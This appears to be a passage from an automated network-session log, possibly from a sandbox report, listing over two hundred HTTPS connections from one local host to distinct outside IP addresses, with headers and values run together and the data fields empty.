                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24808192.168.2.135028443.157.64.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24809192.168.2.133423027.205.230.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24810192.168.2.13339988.49.144.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24811192.168.2.134615017.191.116.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24812192.168.2.135400064.103.107.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24813192.168.2.1338732128.164.214.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24814192.168.2.1335364160.132.39.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24815192.168.2.1333236192.8.111.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24816192.168.2.1337460166.117.208.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24817192.168.2.133453034.13.142.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24818192.168.2.133481818.151.183.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24819192.168.2.135797465.97.226.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24820192.168.2.1345414154.0.99.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24821192.168.2.1347740151.189.54.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24822192.168.2.135525465.187.147.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24823192.168.2.1343860172.236.129.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24824192.168.2.1341238169.96.79.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24825192.168.2.1346466168.23.82.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24826192.168.2.1345940131.5.103.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24827192.168.2.134416687.254.86.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24828192.168.2.135646436.39.69.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24829192.168.2.1341534135.79.101.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24830192.168.2.134944466.200.113.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24831192.168.2.1335146101.226.249.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24832192.168.2.1358394138.76.188.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24833192.168.2.133339851.114.96.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24834192.168.2.134156237.126.41.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24835192.168.2.135383423.134.3.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24836192.168.2.13368865.184.104.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24837192.168.2.135373413.45.149.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24838192.168.2.134248241.59.63.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24839192.168.2.133689682.9.177.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24840192.168.2.1352318190.181.165.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24841192.168.2.1342916189.212.115.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24842192.168.2.1342748219.72.76.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24843192.168.2.1339610194.224.75.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24844192.168.2.1351484165.45.94.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24845192.168.2.135994844.158.186.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24846192.168.2.135327872.69.246.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24847192.168.2.1338158184.46.17.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24848192.168.2.1342372147.194.241.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24849192.168.2.134071420.109.231.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24850192.168.2.1339396120.201.106.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24851192.168.2.1349978168.126.115.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24852192.168.2.135308623.254.60.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24853192.168.2.1355218110.149.124.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24854192.168.2.1337376210.39.188.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24855192.168.2.1342714154.249.164.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24856192.168.2.1357942108.67.28.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24857192.168.2.1354912149.68.109.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24858192.168.2.1345298129.143.238.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24859192.168.2.1353100157.133.186.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24860192.168.2.133458891.239.92.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24861192.168.2.134954243.51.139.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24862192.168.2.1338468128.196.255.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24863192.168.2.134559458.39.98.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24864192.168.2.1335270223.152.71.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24865192.168.2.1339412191.3.121.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24866192.168.2.1338532106.127.255.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24867192.168.2.1360040205.154.64.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24868192.168.2.1344586138.10.58.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24869192.168.2.13458664.246.97.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24870192.168.2.1343534124.9.7.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24871192.168.2.133947271.169.24.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24872192.168.2.1340026134.236.225.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24873192.168.2.1347812122.152.54.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24874192.168.2.1333236158.59.182.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24875192.168.2.1341262195.113.146.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24876192.168.2.134942673.171.36.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24877192.168.2.1344464185.166.244.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24878192.168.2.1339278110.93.72.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24879192.168.2.135722668.205.117.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24880192.168.2.1348530121.125.247.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24881192.168.2.134534418.221.217.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24882192.168.2.1334510200.175.60.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24883192.168.2.1344900145.117.53.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24884192.168.2.134541085.246.2.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24885192.168.2.134487819.115.193.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24886192.168.2.133693683.160.146.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24887192.168.2.134434820.230.48.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24888192.168.2.135528089.53.3.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24889192.168.2.1346390189.16.35.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24890192.168.2.1349088145.102.22.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24891192.168.2.1336812217.209.233.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24892192.168.2.135927658.248.167.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24893192.168.2.133652265.106.66.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24894192.168.2.135837059.214.188.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24895192.168.2.1335496202.163.76.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24896192.168.2.133840275.113.240.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24897192.168.2.135792888.227.235.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24898192.168.2.134578485.210.163.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24899192.168.2.1359860113.68.135.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24900192.168.2.1342536121.165.118.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24901192.168.2.1356750189.127.25.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24902192.168.2.1349378184.129.240.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24903192.168.2.1338718217.216.70.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24904192.168.2.1347056168.113.249.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24905192.168.2.1357696197.115.115.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24906192.168.2.133663468.197.103.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24907192.168.2.1334214130.93.150.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24908192.168.2.1336080158.153.231.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24909192.168.2.1345374166.24.229.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24910192.168.2.1353048192.42.5.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24911192.168.2.1346320124.105.255.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24912192.168.2.1355164132.236.83.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24913192.168.2.1353666120.196.184.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24914192.168.2.1347542129.221.67.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24915192.168.2.1351926168.214.1.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24916192.168.2.1355116153.10.108.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24917192.168.2.1355942104.80.51.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24918192.168.2.1353544167.42.61.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24919192.168.2.135133492.83.81.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24920192.168.2.136003638.213.196.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24921192.168.2.1336038121.92.187.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24922192.168.2.1350910212.13.94.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24923192.168.2.1351172116.128.213.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24924192.168.2.1351614180.18.209.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24925192.168.2.134194678.204.192.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24926192.168.2.133590862.205.6.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24927192.168.2.1344266133.235.215.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24928192.168.2.134299489.95.78.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24929192.168.2.135452691.56.23.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24930192.168.2.133443479.154.150.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24931192.168.2.1340832154.28.228.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24932192.168.2.1341062103.230.86.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24933192.168.2.1348754189.32.90.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24934192.168.2.134075877.111.86.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24935192.168.2.134192067.148.107.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24936192.168.2.133630645.199.195.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24937192.168.2.1355724173.7.26.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24938192.168.2.1349486103.110.86.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24939192.168.2.13573905.48.225.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24940192.168.2.133674265.252.111.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24941192.168.2.134579297.87.88.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24942192.168.2.1341224196.184.160.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24943192.168.2.1335906117.70.38.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24944192.168.2.136078491.195.1.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24945192.168.2.135933486.15.29.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24946192.168.2.1346158113.101.11.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24947192.168.2.133367257.151.69.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24948192.168.2.133549851.112.61.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24949192.168.2.1338336205.171.134.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24950192.168.2.133825895.117.176.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24951192.168.2.1336562173.242.25.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24952192.168.2.1348110175.20.221.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24953192.168.2.134131454.78.40.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24954192.168.2.1357186143.145.195.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24955192.168.2.133995035.144.16.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24956192.168.2.1354662210.54.201.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24957192.168.2.1348908166.185.141.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24958192.168.2.136036238.162.30.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24959192.168.2.1359722143.174.183.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24960192.168.2.1359180209.91.149.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24961192.168.2.135695687.193.241.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24962192.168.2.135828496.65.50.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24963192.168.2.135222469.50.72.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24964192.168.2.1340134159.37.114.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24965192.168.2.1339344124.239.77.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24966192.168.2.1334342136.18.147.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24967192.168.2.13503121.178.197.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24968192.168.2.135060046.171.181.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24969192.168.2.1359868105.76.67.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24970192.168.2.1348816140.192.238.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24971192.168.2.1347282125.154.226.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24972192.168.2.135098820.68.52.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24973192.168.2.133407260.2.106.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24974192.168.2.135957014.92.194.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24975192.168.2.1338392115.222.65.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24976192.168.2.1348542169.16.182.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24977192.168.2.1342136169.92.150.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24978192.168.2.1346580182.253.158.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24979192.168.2.134877483.214.111.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24980192.168.2.133744448.150.195.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24981192.168.2.1351902187.107.114.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24982192.168.2.133340263.158.224.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24983192.168.2.1348098209.214.51.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24984192.168.2.1357610202.12.180.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24985192.168.2.1353026146.3.187.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24986192.168.2.1348362124.230.245.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24987192.168.2.1344942121.127.207.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24988192.168.2.1353616165.0.230.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24989192.168.2.1334756222.142.2.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24990192.168.2.1335596119.208.46.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24991192.168.2.133579090.16.52.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24992192.168.2.1334690178.66.223.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24993192.168.2.1338510132.82.244.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24994192.168.2.1350974170.208.46.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24995192.168.2.135437098.171.51.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24996192.168.2.1360562169.157.98.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24997192.168.2.1351906101.56.56.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24998192.168.2.1333736173.250.253.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24999192.168.2.1350554176.2.244.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25000192.168.2.1354430213.136.28.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25001192.168.2.134330896.33.36.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25002192.168.2.133669412.137.90.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25003192.168.2.135765477.194.182.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25004192.168.2.1356248120.32.98.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25005192.168.2.13566669.78.172.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25006192.168.2.1348956222.216.107.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25007192.168.2.135094891.94.42.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25008192.168.2.1343890163.252.164.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25009192.168.2.1360140138.47.84.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25010192.168.2.1334582146.136.230.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25011192.168.2.1343328195.100.118.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25012192.168.2.13537549.141.123.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25013192.168.2.1341398100.173.114.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25014192.168.2.1347438173.155.171.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25015192.168.2.1359960193.133.251.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25016192.168.2.1358360124.125.236.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25017192.168.2.135777081.250.232.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25018192.168.2.1339512106.152.105.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25019192.168.2.133815240.68.237.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25020192.168.2.1347560200.92.122.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25021192.168.2.1341902159.230.71.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25022192.168.2.135897474.150.202.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25023192.168.2.134566279.141.89.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25024192.168.2.135002412.103.224.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25025192.168.2.136089861.192.83.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25026192.168.2.1336966135.142.214.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25027192.168.2.1334264151.221.159.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25028192.168.2.1343380184.237.14.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25029192.168.2.135267058.112.13.62443
